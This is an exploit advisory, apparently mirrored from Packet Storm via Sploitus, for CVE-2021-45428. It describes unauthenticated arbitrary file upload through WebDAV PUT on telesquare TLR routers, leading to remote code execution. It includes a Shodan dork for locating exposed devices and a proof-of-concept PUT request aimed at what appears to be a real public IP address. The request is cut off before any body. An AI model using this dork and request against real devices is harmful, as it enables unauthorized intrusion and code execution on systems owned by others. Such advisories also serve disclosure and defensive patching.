Share
## https://sploitus.com/exploit?id=PACKETSTORM:167101
# Exploit Title: TLR-2005KSH - Arbitrary File Upload  
# Date: 2022-05-11  
# Shodan Dork: title:"Login to TLR-2021"  
# Exploit Author: Ahmed Alroky  
# Author Company : Aiactive  
# Version: 1.0.0  
# Vendor home page : http://telesquare.co.kr/  
# Authentication Required: No  
# Tested on: Windows  
# CVE: CVE-2021-45428  
  
# Vulnerability Description  
# Due to the Via WebDAV (Web Distributed Authoring and Versioning),  
# on the remote server,telesquare TLR-2021 allows unauthorized users to upload  
# any file(e.g. asp, aspx, cfm, html, jhtml, jsp, shtml) which causes  
# remote code execution as well.  
# Due to the WebDAV, it is possible to upload the arbitrary  
# file utilizing the PUT method.  
  
# Proof-of-Concept  
# Request  
  
  
PUT /l6f3jd6cbf.txt HTTP/1.1  
Host: 223.62.114.233:8081<http://223.62.114.233:8081/>  
Accept-Encoding: gzip, deflate  
Accept: */*  
Accept-Language: en  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36  
Connection: close  
Content-Length: 10